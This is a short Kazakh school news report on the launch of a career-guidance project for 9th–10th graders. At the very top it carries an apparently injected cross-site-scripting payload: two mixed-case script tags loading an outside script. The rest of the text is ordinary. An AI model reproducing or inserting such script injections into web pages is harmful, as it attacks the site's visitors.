<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.02.2018

Ғ.Әбдірахманұлы атындағы Қима орта мектебінде 19-ақпан күні Елбасының «Рухани жаңғыру» мақаласы аясында «Мамандық әлемі» жобасының тұсаукесері жасалды. Мақсаты: білім алушыларды мамандық таңдауға үйрету, мамандықтар туралы түсініктерін кеңейту.

Жобаға 9-10 сынып оқушылары қатысты. 9 «Ә» сынып жетекшісі - Рахметова А.Қ. кіріспе ретінде мамандықтардың түрлері мен маңызы туралы жақсы баяндап, түсініктерін кеңейтті. Осыған қоса, 9 «А» сынып жетекшісі – Сейдахметова Роза Қырықпаевна өзінің сөзінде болашақ мамандықты таңдау кезінде үлкен жауапкершілікпен қарау керек екендігін түсіндірді.

Оқушылар атынан Хамит Аяулым келешекте журналистика мамандығын таңдайтыны туралы айтып, бұл мамандықтың қыр-сырлары туралы айтып берді.

Жобаның келесі кезеңінде оқушылар ата-анасының жұмысына 3 күн барып, зерттеу жұмыстарын жүргізеді.

Просмотров: 546


Пікір қосу



Деректерді қолтаңбаға қосу